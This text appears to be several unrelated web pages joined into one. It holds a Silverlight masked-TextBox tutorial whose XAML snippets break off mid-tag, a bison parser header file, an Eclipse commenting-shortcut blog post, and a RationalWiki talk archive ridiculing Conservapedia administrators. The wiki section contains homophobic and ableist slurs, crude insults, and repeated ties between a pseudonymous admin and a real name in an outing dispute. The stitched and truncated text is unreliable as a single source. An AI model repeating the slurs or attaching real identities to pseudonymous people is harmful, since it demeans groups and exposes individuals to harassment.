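The two recap sections above lost their embedded examples in this copy, including the incrementor-function example the text refers to. As a stand-in, here is a minimal sketch of both ideas; it is a reconstruction under the obvious reading of the headings, not the original article's code.

# Ternary operator: <value_if_true> if <condition> else <value_if_false>
x = 42
label = "big" if x > 100 else "small"
print(label)  # small

# Lambda functions: anonymous single-expression functions.
# A lambda that generates an "incrementor" function for a fixed step.
make_incrementor = lambda step: (lambda x: x + step)
increment_by_two = make_incrementor(2)
print(increment_by_two(10))  # 12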
https://blog.finxter.com/python-ternary-lambda/
CC-MAIN-2022-21
refinedweb
299
66.84
Overview Atlassian SourceTree is a free Git and Mercurial client for Windows. Atlassian SourceTree is a free Git and Mercurial client for Mac. django-qsstats-magic: QuerySet statistics for Django The goal of django-qsstats is to be a microframework to make repetitive tasks such as generating aggregate statistics of querysets over time easier. It's probably overkill for the task at hand, but yay microframeworks! django-qsstats-magic is a refactoring of django-qsstats app with slightly changed API, simplified internals and faster time_series implementation. Requirements - python-dateutil > 1.4, < 2.0 - django 1.2+ License Liensed under a BSD-style license. Examples How many users signed up today? this month? this year? from django.contrib.auth.models import User import qsstats qs = User.objects.all() qss = qsstats.QuerySetStats(qs, 'date_joined') print '%s new accounts today.' % qss.this_day() print '%s new accounts this week.' % qss.this_week() print '%s new accounts this month.' % qss.this_month() print '%s new accounts this year.' % qss.this_year() print '%s new accounts until now.' % qss.until_now() This might print something like: 5 new accounts today. 11 new accounts this week. 27 new accounts this month. 377 new accounts this year. 409 new accounts until now. Aggregating time-series data suitable for graphing from django.contrib.auth.models import User import datetime, qsstats qs = User.objects.all() qss = qsstats.QuerySetStats(qs, 'date_joined') today = datetime.date.today() seven_days_ago = today - datetime.timedelta(days=7) time_series = qss.time_series(seven_days_ago, today) print 'New users in the last 7 days: %s' % [t[1] for t in time_series] This might print something like: New users in the last 7 days: [3, 10, 7, 4, 12, 9, 11] Please see qsstats/tests.py for similar usage examples. API The QuerySetStats object In order to provide maximum flexibility, the QuerySetStats object can be instantiated with as little or as much information as you like. All keword arguments are optional but DateFieldMissing and QuerySetMissing will be raised if you try to use QuerySetStats without providing enough information. - qs The queryset to operate on. Default: None - date_field The date field within the queryset to use. Default: None - aggregate The django aggregation instance. Can be set also set when instantiating or calling one of the methods. Default: Count('id') - operator The default operator to use for the pivot function. Can be also set when calling pivot. Default: 'lte' - today The date that will be considered as today date. If today param is None QuerySetStats' today will be datetime.date.today(). Default: None All of the documented methods take a standard set of keyword arguments that override any information already stored within the QuerySetStats object. These keyword arguments are date_field and aggregate. Once you have a QuerySetStats object instantiated, you can receive a single aggregate result by using the following methods: for_minute for_hour for_day for_week for_month for_year Positional arguments: dt, a datetime.datetime or datetime.date object to filter the queryset to this interval (minute, hour, day, week, month or year). this_minute this_hour this_day this_year Wrappers around for_<interval> that uses dateutil.relativedelta to provide aggregate information for this current interval. 
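To make the constructor arguments described above concrete, here is a small hypothetical sketch that passes an explicit aggregate instead of the default Count('id'). The Order model and the myshop app are invented for illustration; only the QuerySetStats keyword arguments come from the documentation above.

from django.db.models import Sum
import qsstats

# Hypothetical model: Order with a DecimalField 'total' and a DateTimeField 'created'.
from myshop.models import Order

qs = Order.objects.all()
# Sum revenue per period instead of counting rows.
qss = qsstats.QuerySetStats(qs, 'created', aggregate=Sum('total'))
print('Revenue so far: %s' % qss.until_now())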
QuerySetStats also provides a method for returning aggregated time-series data which may be extremely using in plotting data: - time_series Positional arguments: start and end, each a datetime.date or datetime.datetime object used in marking the start and stop of the time series data. Keyword arguments: In addition to the standard date_field and aggregate keyword argument, time_series takes an optional interval keyword argument used to mark which interval to use while calculating aggregate data between start and end. This argument defaults to 'days' and can accept 'years', 'months', 'weeks', 'days', 'hours' or 'minutes'. It will raise InvalidInterval otherwise. This methods returns a list of tuples. The first item in each tuple is a datetime.datetime object for the current inverval. The second item is the result of the aggregate operation. For example: [(datetime.datetime(2010, 3, 28, 0, 0), 12), (datetime.datetime(2010, 3, 29, 0, 0), 0), ...] Formatting of date information is left as an exercise to the user and may vary depending on interval used. - until Provide aggregate information until a given date or time, filtering the queryset using lte. Positional arguments: dt a datetime.date or datetime.datetime object to be used for filtering the queryset since. Keyword arguments: date_field, aggregate. - until_now Aggregate information until now. Positional arguments: dt a datetime.date or datetime.datetime object to be used for filtering the queryset since (using lte). Keyword arguments: date_field, aggregate. - after Aggregate information after a given date or time, filtering the queryset using gte. Positional arguments: dt a datetime.date or datetime.datetime object to be used for filtering the queryset since. Keyword arguments: date_field, aggregate. - after_now Aggregate information after now. Positional arguments: dt a datetime.date or datetime.datetime object to be used for filtering the queryset since (using gte). Keyword arguments: date_field, aggregate. - pivot Used by since, after, and until_now but potentially useful if you would like to specify your own operator instead of the defaults. Positional arguments: dt a datetime.date or datetime.datetime object to be used for filtering the queryset since (using lte). Keyword arguments: operator, date_field, aggregate. Raises InvalidOperator if the operator provided is not one of 'lt', 'lte', gt or gte. Testing If you'd like to test django-qsstats-magic against your local configuration, add qsstats to your INSTALLED_APPS and run ./manage.py test qsstats. The test suite assumes that django.contrib.auth is installed. For testing against different python, DB and django versions install tox (pip install tox) and run 'tox' from the source checkout: $ tox Db user 'qsstats_test' with password 'qsstats_test' and a DB 'qsstats_test' should exist. Difference from django-qsstats - Faster time_series method using 1 sql query (currently works for MySQL and PostgreSQL, with a fallback to the old method for other DB backends). - Single aggregate parameter instead of aggregate_field and aggregate_class. Default value is always Count('id') and can't be specified in settings.py. QUERYSETSTATS_DEFAULT_OPERATOR option is also unsupported now. - Support for minute and hour aggregates. - start_date and end_date arguments are renamed to start and end because of 3. - Internals are changed. I don't know if original author (Matt Croydon) would like my changes so I renamed a project for now. 
If the changes will be merged then django-qsstats-magic will become obsolete.
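As a companion to the API notes above, the following sketch exercises time_series with a non-default interval and pivot with an explicit operator. It assumes the same User/date_joined setup as the README examples and should be read as an illustration of the documented signatures rather than tested code.

import datetime
import qsstats
from django.contrib.auth.models import User

qss = qsstats.QuerySetStats(User.objects.all(), 'date_joined')

today = datetime.date.today()
start = today - datetime.timedelta(days=365)

# Monthly totals for the past year: a list of (datetime, aggregate) tuples.
monthly = qss.time_series(start, today, interval='months')
print([count for _, count in monthly])

# Accounts created on or after the start date, using pivot with an explicit operator.
print(qss.pivot(start, operator='gte'))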
https://bitbucket.org/kmike/django-qsstats-magic/
CC-MAIN-2017-30
refinedweb
1,055
53.07
After a long Beta testing process, Tik Manager v3 is finally released. Tik Manager is a lightweight multi-platform and multi-software project management system. It is designed for small-mid range teams and individuals. Tik Manager is completely free for both personal and commercial use. Some of the improvement in v3 are: - Single Executable Windows installer - Completely new settings menu with lots of options to customize - Re-designed Asset Library with 3ds Max and Houdini support - Transfer Central to transfer assets easily between softwares - Photoshop support - Mp4 conversion for all preview files - Lots of UI improvements - Tons of Bug fixes Check the complete version history Download 16 Comments To Whom It may concern: I attempted to install the TIK application multiple times on windows 10 pro but it didn’t begin the installation. Is there a support forum available to post error messages or questions? Thank you, -Chris Hi Chris, You may need to disable your virus software before installation. Some av softwares gives a false positive for it. This is related with the PyInstaller (the library which I use to turn python files to executables) If you write down your error messages I can help you further. You can join the facebook group as well for Q&A: This looks pretty good, thank you so much for the time and effort put into it. Is there any support for sequence-shot based workflow other than just naming your animation files with the shot names? Thank you Spiderman, Actually sequence-shot based workflow is a little bit complex for small teams and individuals since it needs more nested folders. I agree it is a more suitable approach for relatively bigger projects but what I try to do is keep things simple as possible and a tool that doesn’t need to be learned. However, I am searching to expand the usage as the way you suggested without compromising simplicity. I would like to hear the ideas about the subject. Would this work with Maya 2022 python 3 or do you need to use the python2 on startup? Looks great, many thanks. Hi. Latest version is python3 compatible. Test driving Tik going forward due to python2 issue on previous manager. Would it be possible in a future release have the ability to dock the manager? Great job, well done and thank you. I was considered a dockable version but to be honest dockable UIs generally causing me more trouble than the benefits. However, I will give it another thought. Thanks Hi there thanks for getting back. I’m sure it’s not an easy fix to make it dockable but I find that with so many panels that need to stay open during production even on a duel monitor, it’s just a nice and tidy feature to tuck it away but still have it operational. Ive used openPipeline for 15 years and then over to Pipeline2 but there is no further development going forward, so Tik Manager wins for me. Hello. I have just started getting an error on loading TM. Any ideas, it has been working well and cant see why it doesnt want to load from the shelf. Thanks for any help. from tik_manager import SmMaya reload(SmMaya) tik_sceneManager = SmMaya.MainUI(callback=”tik_sceneManager”) tik_sceneManager.show() # Error: NameError: file line 3: name ‘reload’ is not defined # Seems like the shelf button is not updated. Remove this line from button command: reload(SmMaya) And it should be ok. not working maya 2022 It is working on 2022 (and pre-released 2023 as well) Make sure you have the latest version. The shelves may need a recrate too. So better deletr the shelf and do a re-install.
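For anyone hitting the reload() NameError shown above on Python-3-based Maya versions, the fix suggested in the thread is simply to drop that line from the shelf button. A cleaned-up shelf command might look like the sketch below; it reuses only the names that appear in the quoted shelf code, so adjust it to whatever your installed Tik Manager version actually exposes.

# Maya shelf button command (Python), without the Python-2-only reload() call.
from tik_manager import SmMaya

tik_sceneManager = SmMaya.MainUI(callback="tik_sceneManager")
tik_sceneManager.show()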
https://www.ardakutlu.com/tik-manager-v3-released/
CC-MAIN-2022-21
refinedweb
618
62.58
#include <string.h>

void *memmove(void *s, const void *ct, size_t n);

Copies n characters from ct to s and returns s. s will not be corrupted if the objects overlap. The memmove function returns s after moving n characters.

#include <stdio.h>
#include <string.h>

int main()
{
    static char buf[] = "This is line 1 \n"
                        "This is line 2 \n"
                        "This is line 3 \n";

    printf("buf before = %s\n", buf);
    memmove(&buf[0], &buf[16], 32);
    printf("buf after = %s\n", buf);
    return 0;
}

It will produce the following result:

buf before = This is line 1
This is line 2
This is line 3

buf after = This is line 2
This is line 3
This is line 3
http://www.tutorialspoint.com/ansi_c/c_memmove.htm
crawl-001
refinedweb
116
68.64
Gotham -- From Start to Heroku Stay connected In this article, we'll implement and deploy a Gotham full-stack web framework using the Tera template system, Webpack for a complete front-end asset management, a minimal VueJS and CoffeeScript web app and deploy to Heroku. Gotham is a Rust framework which is focused on safety, speed, concurrency and async everything. Webpack is a NodeJS website asset preprocessor and bundler which can let you use. Because there is a lot to unpack here, this article will cover a step-by-step guide to launch these features on Heroku and advise you on common issues that need to be considered. Installing the dependencies Before we worry about the server environment, we need to be able to run the server on our own system. You will need to install each of the following: Since the kind of installation you have to go through depends on your operating system, simply follow the steps provided in the links above for each item. Setting up the project First we generate a Rust project with cargo new mouse cd mouse We'll call this project mouse, as in Mighty Mouse. Next we'll use WebpackerCli to install the initial files for using Webpacker in our project. webpacker-cli init Next we'll edit our Cargo.toml to add the dependencies we need. Add the following to the end of it. [dependencies] gotham = "0.3.0" gotham_derive = "0.3.0" hyper = "0.12.13" mime = "0.3.12" lazy_static = "1.2" tera = "0.11" webpacker = "~0.3" [build-dependencies] webpacker = "~0.3" Now add the following to your build.rs file in the projects main directory. extern crate webpacker; fn main() { println!("Validating dependencies…"); assert!(webpacker::valid_project_dir()); println!("Compiling assets…"); let _ = webpacker::compile(); } Now whenever you run the cargo command to build your project, it will verify your dependencies, bundle and prepare your assets. This is very helpful when you deploy to Heroku as it will tell you which dependencies are missing. A working project The hello world example given on the main page for Gotham is as follows. Put this in your src/main.rs file. extern crate gotham; use gotham::state::State; const HELLO_WORLD: &'static str = "Hello World!"; pub fn say_hello(state: State) -> (State, &'static str) { (state, HELLO_WORLD) } pub fn main() { let addr = "127.0.0.1:7878"; println!("Listening for requests at http://{}", addr); gotham::start(addr, || Ok(say_hello)) } At this point you can run cargo run and use your browser to navigate to to see the hello world example. From here we're going to remove the const HELLO_WORLD line and the entire say_hello method. We'll add a method named index_page, add a method named router, and we'll update the last line of main method to use them. extern crate gotham; extern crate hyper; use gotham::state::State; use gotham::router::builder::{ build_simple_router, DefineSingleRoute, DrawRoutes }; use gotham::router::Router; use hyper::Method; pub fn index_page(state: State) -> (State, (mime::Mime, String)) { let rendered = "Hello World!".to_string(); (state, (mime::TEXT_HTML, rendered)) } pub fn router() -> Router { build_simple_router(|route| { route. request(vec![Method::GET, Method::HEAD], "/"). to(index_page); }) } pub fn main() { let addr = "127.0.0.1:7878"; println!("Listening for requests at http://{}", addr); gotham::start(addr, router()) } This changes introduce mime type support in the method which we now use a router to get to. The router is mapping any request to the root url / to the index_page method. 
For this project we'll follow Rails' outline for organizing the files for the site. Now to demonstrate how to serve static assets in Gotham. Create the following directory structure app/assets/stylesheets in the root of your project. Create a file in that last directory named application.css and give it some styles like so. div { margin: 0 12px 0 12px; } footer { margin-top: 40px; font-size: 6pt; } Towards the top of src/main.rs add use gotham::handler::assets::FileOptions; and inside the build_simple_router code block add the following route option after the one you currently have in there. route. get("style/*"). to_dir( FileOptions::new("app/assets/stylesheets"). with_cache_control("no-cache"). with_gzip(true). build(), ); This will route any requests that try to access the style/ path in the url to any file that's in app/assets/stylesheets. In our HTML code we'll link to this style directly. Before that though you can now try to load the url after you run cargo run and see the styles we've entered in. We're now ready to introduce HTML pages with the Tera templating system. Tera templating in Gotham Tera is a templating DSL for Rust which serializes Rust objects before processing the views. There's very little learning curve to using it as it is designed with common template tasks in mind. We'll rewrite the index_page method to now use Tera and include the stylesheet we've created. Also we'll create a core object to load all our templates from and provide it with a path for our views. In your src/main.rs file update it for the following. #[macro_use] extern crate lazy_static; extern crate tera; use tera::{Context, Tera}; lazy_static! { pub static ref TERA: Tera = Tera::new("app/views/**/*.tera"). map_err(|e| { eprintln!("Parsing error(s): {}", e); ::std::process::exit(1); }). unwrap(); } pub fn index_page(state: State) -> (State, (mime::Mime, String)) { let mut context = Context::new(); let styles = &["style/application.css"]; let sources: &[&'static str] = &[]; context.insert("application_styles", styles); context.insert("application_sources", sources); let rendered = TERA.render("landing_page/index.html.tera", &context).unwrap(); (state, (mime::TEXT_HTML, rendered)) } In the lazy_static! block we create the TERA object which will load all the views and templates into an internal hash like lookup system and by which we will use it to render views with given contexts. The context we provide a view will contain the objects the view are to be updated or generated with. Now we need to create our application template and our landing page for the above code to work. Create the file app/views/layouts/application.html.tera <!DOCTYPE html> <html lang="en"> <head> {% block head %}{% for style in application_styles -%} <link rel="stylesheet" href="{{ style }}" /> {% endfor %}{% for source in application_sources -%} <style scoped> p { font-size: 2em; text-align: center; } </style> Now delete both app/javascript/hello_vue.js and app/javascript/hello_coffee.coffee and create the file app/javascript/hello.coffee and place the following in it. import Vue from 'vue/dist/vue.esm' import App from '../app.vue' document.addEventListener('DOMContentLoaded', -> element = document.getElementById 'vue-app' if element? 
app = new Vue( el: element render: (h) -> h App ) # Vue.config.devtools = true ) In my experimentation the environment JavaScript detects it keeps reporting production regardless of changing local environment variables so if you'd like to use the VueJS Devtool addon for your browser you should uncomment the devtools line above while you work. Now that we have the code to test we need only to include it in our site. Let's change our styles and sources values in the index_page method in src/main.rs to the following: let sources = &[ &asset_source("application.js"), &javascript_pack_tag("hello") ]; let styles = &[ "style/application.css", &stylesheet_pack_tag("hello") ]; We're including both the script and style for our VueJS code by using our _pack method helpers for the hello.coffee file. Now add the following to app/views/landing_page/index.html.tera within the content block. <div id="vue-app"></div> And now you have a working VueJS & CoffeeScript app when you run cargo run and view . Deploying to Heroku To deploy to Heroku you will need to use three separate buildpacks together for NodeJS, Ruby, and Rust. First let's initialize Heroku in our project. Use the Heroku Cli tool: heroku create heroku buildpacks:add heroku/nodejs heroku buildpacks:add heroku/ruby heroku buildpacks:add emk/rust It's very important to include Rust as the last buildpack. Before we can deploy we need to change the way our program hosts it's IP and PORT. Open the src/main.rs file and change the main method to the following. use std::env; pub fn main() { let port = env::var("PORT").expect("PORT env not found!"); let addr = format!("0.0.0.0:{}", port); println!("Listening for requests at {}", addr); gotham::start(addr, router()) } The application won't work on Heroku without binding to both the address 0.0.0.0 and the port number defined by the environment variable. Now to test it locally you have to assign a port number so the command in bash would look like PORT=7878 cargo run. Next we have to let Heroku know what command to run to run the application. Open up a file name Procfile and place the following. web: target/release/mouse The last part is of course the name of the application which we gave it; mouse. Now you need only to commit the source code with git and upload it to heroku. Be sure your .gitignorefile has lines for node_modulesand tmpas you don't want to upload those. git add . git commit -m "Heroku ready" git push heroku master After time enough to brew coffee you can now open the deployed website with the command heroku open. And viola! You've achieved implementing and deploying a fullstack Gotham app. As your application grows it will help to organize similar source code categories together in their own separate files (such as moving routing to src/route.rs). Summary This how-to should save you tons of time figuring out how to get a fullstack Gotham app ready. You can view the source code for this example here on Github. What you have here is a quicker way to get up and going with a very fast and capable website. Fast being what Rust and Gotham bring to the table and capable being what Webpacker and the entire JavaScript ecosystem bring with it. When you use Rust for your website you get the best performance you can in delivery. Any slowness experienced will be from other factors like unoptimized database queries or network latency. It's exciting to be working with both powerful and performant technologies when delivering content. Enjoy! 
Additional resources: Read why SaaS CI/CD solutions can be right for open source projects. Use CodeShip Pro and Traefik for development. Learn how Ruby on Rails can optimize CI testing.
https://www.cloudbees.com/blog/gotham-from-start-to-heroku
CC-MAIN-2022-40
refinedweb
1,756
66.23
One material type to another [SOLVED] On 07/07/2016 at 15:12, xxxxxxxx wrote: Here I have a somewhat basic script that takes all materials and creates c4d materials based on their names. What I really want to do is actually create the new materials and replace all the materials in the scene with c4d ones. Useful for situations where I find myself needing to convert other render engine materials to basic ones for export. I of course get the creating part, how can I do the conversion? As it stands I run this script and then have to do alt dragging to manually replace my original materials.

import c4d
from c4d import gui

def main():
    mats = doc.GetMaterials()
    for mat in mats:
        new_mat = c4d.BaseMaterial(c4d.Mmaterial)  # create standard material
        new_mat[c4d.ID_BASELIST_NAME] = mat.GetName() + "_c4d"
        doc.InsertMaterial(new_mat, pred=None, checknames=True)
    c4d.EventAdd()

if __name__ == '__main__':
    main()

On 08/07/2016 at 01:19, xxxxxxxx wrote: Hello, in Cinema 4D materials are assigned to objects using a Texture Tag. This texture tag is assigned to the object and references the used material through a BaseLink parameter. So you have to change this BaseLink on the texture tag. The easiest way to change the BaseLinks is to use BaseList2D.TransferGoal() on the original material with the new material as an argument. This function changes all BaseLinks referencing the given original material. Best wishes, Sebastian On 09/07/2016 at 12:29, xxxxxxxx wrote: That works like a dream. Thanks.
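The accepted answer points at BaseList2D.TransferGoal(), but the finished script never gets posted. A sketch of how the two pieces might be combined is below; it only uses calls that appear in this thread (GetMaterials, BaseMaterial, InsertMaterial, TransferGoal, EventAdd), and the exact TransferGoal arguments should be checked against the Cinema 4D SDK documentation for your version.

import c4d

def main():
    for mat in doc.GetMaterials():
        # Create a plain standard material named after the original.
        new_mat = c4d.BaseMaterial(c4d.Mmaterial)
        new_mat[c4d.ID_BASELIST_NAME] = mat.GetName() + "_c4d"
        doc.InsertMaterial(new_mat, pred=None, checknames=True)
        # Re-point every BaseLink (e.g. texture tags) from the old material to the new one.
        mat.TransferGoal(new_mat)
    c4d.EventAdd()

if __name__ == '__main__':
    main()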
https://plugincafe.maxon.net/topic/9582/12864_one-material-type-to-another-solved
CC-MAIN-2019-22
refinedweb
246
57.47
Andrea Crotti wrote: > On 02/10/2012 03:27 PM, Peter Otten wrote: >> The package a will be either a.c/a/ or a.b/a/ depending on whether >> a.c/ or a.b/ appears first in sys.path. If it's a.c/a, that does not >> contain a c submodule or subpackage. > > > I would agree if I didn't have this declaration > __import__('pkg_resources').declare_namespace(__name__) > in each subdirectory. Sorry, you didn't mention that in the post I responded to and I didn't follow the thread closely. I found a description for declare_namespace() at but the text explaining the function is completely unintelligible to me, so I cannot contribute anything helpful here :(
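Since the thread never spells out what declare_namespace() implies for the package layout, here is a hedged sketch of the legacy pkg_resources-style arrangement being discussed: two separately installed source trees contributing submodules to the same top-level package 'a'. The paths and module names are illustrative, not taken from the original poster's project.

# Distribution 1: a.b/
#   a/__init__.py        <- contains only the namespace declaration
#   a/b/__init__.py
# Distribution 2: a.c/
#   a/__init__.py        <- identical namespace declaration
#   a/c/__init__.py

# Contents of each a/__init__.py:
__import__('pkg_resources').declare_namespace(__name__)

# With both directories on sys.path, the namespace machinery merges them,
# so both submodules import even though they live in different trees:
import a.b
import a.c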
https://mail.python.org/pipermail/python-list/2012-February/619673.html
CC-MAIN-2019-51
refinedweb
116
62.54
Random access files, as the name suggests, let you access the content of a file from anywhere. The access here means read or write. That means you are not limited to writing into a blank file from the start or appending only at the end of the file. There is a file pointer which can be positioned anywhere, and you can do the file operation at that position. The Java core IO package, java.io, provides the RandomAccessFile class which supports this functionality. Using this class is not different from using the other byte or character classes for file IO. There is only one additional step, and that step is optional, but necessary in case you want to do some random access work: pointer management. Don't worry, this is not the 'C' or 'C++' pointer we are talking about. This is the file position pointer, the pointer which tells the program the current access location in the file. When you open the file initially it is at position 0. You can manage the pointer location using the method provided by the RandomAccessFile class, seek(long position); it has a void return type and it moves the pointer to the position we pass as an argument. The argument is of type long because the file could be large.

The following program will illustrate the use of the RandomAccessFile class. For demonstration purposes we are using a file named inputfile.txt to which we have added the following four lines.

line one in input file.
line two in input file.
line three in input file.
last line in input file.

So now let us look at the program.

import java.io.*;

class RA {
    public static void main(String[] args) throws IOException {
        RandomAccessFile ras = null;
        try {
            ras = new RandomAccessFile("inputfile.txt", "r");
            System.out.println(ras.getFilePointer());
            System.out.println(ras.readLine());
            ras.seek(20);
            System.out.println(ras.getFilePointer());
            System.out.println(ras.readLine());
            System.out.println(ras.getFilePointer());
        } catch (Exception ioe) {
            System.out.println(ioe);
        } finally {
            if (ras != null)
                ras.close();
        }
    }
}

In the program, first of all we have created an object of RandomAccessFile which takes as parameters the file path (there is another constructor which takes a File object as parameter) and the access mode for the file. Here we are only reading from the file, so we use "r", but if you want to open the file for read-write operations you should use the "rw" mode. Next we print the position of the file pointer using the method getFilePointer(), which returns the current location of the file pointer. Then we read a line, move the pointer to position 20 using the seek() method, and repeat the operation. Here we have used the readLine() method to read a whole line, but there are other methods in RandomAccessFile such as readInt(), readDouble(), readChar() and so on. You can use whichever suits your requirement. The output of the program is as follows:

0
line one in input file.
20
le.
24

As we said, the initial position of the pointer is 0, so the program prints 0 and reads the first line. After that we move the pointer to position 20 and read again, and it prints "le.", because position 20 falls near the end of the first line, "line one in input fi*le." (the * marks position 20).

Note: the value we pass to the seek() method is an absolute position measured from the beginning of the file (position 0); it is not an offset added to the current position of the file pointer. That is why getFilePointer() returns 20 immediately after the seek(20) call, and why reading the rest of that line leaves the pointer at 24. This way we can move anywhere in the file and read or write at that position. A typical use of this class is to perform file operations on an arbitrarily chosen part of a file, or to bookmark a position in a file.
http://www.examsmyantra.com/article/61/java/random-access-files-in-java
CC-MAIN-2019-09
refinedweb
711
63.8
Convert classic asp razor työt need to convert it into project libre we have 360 degree photos and we need to convert that into 3d models. I need a format converter to convert a file with cookies to another format cookies. It's very easy to do it. Anyone can apply if you have coding skills. I have hundreds PDFs that I need converted to word , if you can complete the attached file in less than 2 days with maximum perfection, then more project can come you way. This is an urgent task, please bid if you are serious.. For the first part of the project, I need a one page website created with ASP.NET MVC Razor Syntax with HTML, CSS, Javascript. I have included a snapshot of how the page should appear. It should be a web application accessible from an Iphone' s Safari Web Browser with a quote form based on QMS desktop page that is shown on the attachment. the pdf file has 1 page (one section repeated 3 times in the same page). need to convert it to html (inline style only, no bootstrap, no css) simple html hello i am looking for someone to create an realist and animation pictures of my cats , into a 5 page story of there daily life or by theme i'm looking for about 5-10 pictures to convert into my online story i am making Convert our gallery creation software into an automated script or program that will run when the user logs in. Details and examples are included in the attached items. $320 Necesito armar un sistema de gestion de gimnasios con gestion de cuotas, venta de productos de hidratacion e indumentaria y gestion de caja con Multi usuario. Tipos de usuarios: Administrador Dueño GYM Cajeros Personas Al decir multiGimnasio quiero decir que necesito que yo como administrador pueda crear Gimnasios ilimitados y luego asignarlos a los dueños para que ellos creen caj.... [kirjaudu nähdäksesi URL:n] I am in need of someone that can take this [kirjaudu nähdäksesi URL:n] ) ... I have a client who needs to convert psd to html in angular application. Needs to be done asap. Serious bidder only can contact..... Hi, I am starting my own Jewellery online business and I am looking for someone to help me to create a high-quality modern but still classic logo. Let me know if you are able to do this and I will provide you with more information. Company name: KJK & Co I have taken some inspiration for this in the files below. Thank you, J Looking for Marketting /Sales executive with experience in ecommerce domain, able to generate leads and convert them (B2B). We have a website in wordpress. You have to generate plain HTML website. You have to follow web standards. Ping me for more details. I need a front end developer who can convert the PSD to responsive HTML design. We are a social enterprise based in US, focused on improving rural incomes by providing financed and warrantied productive-use solar equipment. [kirjaudu nähdäksesi URL:n] We would like to improve the speed of our website and convert to https exclusively. We will use [kirjaudu nähdäksesi URL:n] to calculate before and after score. We are expecting a 2x-4x reduction in loading ... ***PLEASE BID YOUR REAL BID, I WILL NOT NEGOTIATE*** I need a Wordpress plugin that : 1) Creates 3 shortcodes A) One for student info menu that allows for input of student - i) name a) Chinese surname (Chinese) b) Chinese surname (PinYin) c) Chinese given name (Chinese) d) Chinese given name (PinYin) e) English given name ii) school na.... Have a project VS 2015, AngularJS, ASP.NET MVC, C#, Razor,... Need support, working on issues, new functionality. 
Will not be able to share code base. We'll have to work in Q/A mode. Let's chat if interested. Hello, looking for copywriter with experience in World of Warcraft (BFA/Classic). Need x10 text 500-600 symbols right now (will need much more in the future). requirements: 1. native english 2. experience in wow 3. experience in writing seo-texts Price negotiable Hi, I would like to hire a programmer that can convert existing Joomla Template to have the following features : 1. Autofit on all desktop size 2. Sample website that are autofit are as the following link [kirjaudu nähdäksesi URL:n] Autofit means when view using desktop pc, it will show only single page and will not able to scroll. Link of the existing Joomla Website that need classic + Informative + Crisp + Mobile Friendly + SEO Friendly Website for My Business. I have decided Theming + Basic Wireframes + Content for my Website. Looking for Quick and Expert developer who can deliver 15 Pages site within in 15 Working Days. I need help to convert a H5 code to Cocos framework. You will need to know how to run the resulting code on Wechat mini game platform. Some modification on the source code is needed. Pls ping me to discuss. I need some help with finding some potencial client for a Men clothes store. import sys import base64 import requests import json # put desired file path here file_path = '[kirjaudu nähdäksesi URL:n]' image_uri = "data:image/jpg;base64," + [kirjaudu nähdäksesi URL:n](open(file_path, "rb").read()).decode() r = [kirjaudu nähdäksesi URL:n]("[kirjaudu nähdäksesi URL:n]", data=[kirjaudu nähd&a... It's a Flutter App project that will use firebase as backend using firestore/cloud messaging/cloud function. we will need to convert HTML from FireStore DB into Flutter app it's all in arabic RTL. I have the sketch design and the database scheme. The app contain 21 pages including splash page / slides page and sign in page - 3 tabs 4 of the pages are html page fetch from firebase. will.... I need the given 3D animation in Html5 code for to avoid slowing down the website so I need the HTML5 code of the animation You Can download the animation from here [kirjaudu nähdäksesi URL:n] but I dont want the following techniques for this job ==> - Embed MP4 or Gif using HTML5 - Image Sequence Technique - Bodymovin becouse it's not working with 3D animation's We have a vector logo and require it to be an animated gif with a transparent background, it is a vector butterfly, the butterfly to have it's wings flapping My project will use firebase as backend using firestore/cloud messaging/cloud function. we will need to convert HTML into flutter it's all in arabic RTL. the admin panel will be in English only. I have the sketch design and the database scheme the app contain 21 pages including splash page / slides page and sign in page - 3 tabs 4 of the pages are html page fetch from firebase. will use nati... 2. Load [kirjaudu nähdäksesi URL:n] &ldqu...?
https://www.fi.freelancer.com/job-search/convert-classic-asp-razor/3/
CC-MAIN-2019-30
refinedweb
1,145
62.98
Dynamic Inlines in the Django AdminAug 03, 2016 Django Django1.9 Tweet I'm not sure how many of you know this, but in the interest of having a well-rounded life, I make a lot of things in my spare time. Over the years, I've been a costumer, a jeweller, a photographer, and a glass artist, among other things. And I don't just mean dabbling - when I get interested in learning something, I throw myself into it almost to the point of fanaticism. I make a lot of things. Which means I have a lot of things filling up my closets and drawers. There's only so much I can gift for birthdays and holidays. So lately I've opened up a shop on Etsy. Opening shops in online marketplaces has meant keeping track of a lot of things around inventory. Etsy's listings manager is nice, but it doesn't really give me everything I want. For a while, I've been using a spreadsheet to keep track of my Etsy listings. But I'm also about to open a shop on Spoonflower. And I'm considering ArtFire. And I need a better way to manage the supplies I use. And I want to keep all this stuff in one place. Naturally, because I'm a programmer, I'm building my own inventory manager. I just started a day ago, so there's obviously a lot of work ahead - I hadn't given a lot of deep thought to what the account and item models needed to look like, so I've been making liberal use of migrations. (I should point out that I'm using Django 1.9. I love it - I've been mired in 1.3 for a while at work, used 1.6 for a few small personal projects, and made it onto 1.8 for some more recent work projects. I love the slight changes in the admin look, and finally having the built-in migrations is a dream come true.) The items I'm storing use a base Item model with a lot of common fields like name, description, and price. But Etsy listings also use some values that are unique, such as Etsy-specific categories, when the item was made, a list of materials to use as search tags, and so on. Meanwhile, Spoonflower listings take a totally different set of parameters, such as material type, colors, and the type of repeat you want to use for your image. For each marketplace (so far just Etsy and Spoonflower), I've added models for values that are only needed when the item is listed on that market. class EtsyItem(models.Model): """ Fields used when the item is listed on 'Etsy' """ item = models.ForeignKey(Item) ... class SpoonflowerItem(models.Model): """ Fields used when the item is listed on 'Spoonflower' """ item = models.ForeignKey(Item) ... This structure does assume that an Item wouldn't be listed on multiple markets - I may leave it that way and just add functionality to allow one Item's basic values to be copied to another record, to be associated with a different market so that each listing is unique. I did also consider subclassing the Item model, but I'm serious about wanting to keep everything in one place - I'd rather not have to manage items in an Etsy list versus a Spoonflower list, etc. Maybe I'll change my mind about that and rewrite this whole thing. But in the meantime, keeping everything together under that Item model presented a challenge - how to add/display the marketplace-specific data for an Item in the admin? I wanted to be able to show the Etsy model as an inline for an item listed for Etsy, a Spoonflower inline for a Spoonflower item, and so on. 
Here's what I did (and of course you can see this in the inventory/admin.py in the repository):

from .models import EtsyItem, SpoonflowerItem

class EtsyItemInline(admin.StackedInline):
    model = EtsyItem
    extra = 1
    max_num = 1

class SpoonflowerItemInline(admin.StackedInline):
    model = SpoonflowerItem
    extra = 1
    max_num = 1

I started with inlines for each of the custom models. Each Item should have only one of its respective inline objects - setting "extra=1" and "max_num=1" ensures that one instance of that inline will load but that no additional instances can be added to the page.

class ItemAdmin(admin.ModelAdmin):
    ...
    inlines = [
        EtsyItemInline,
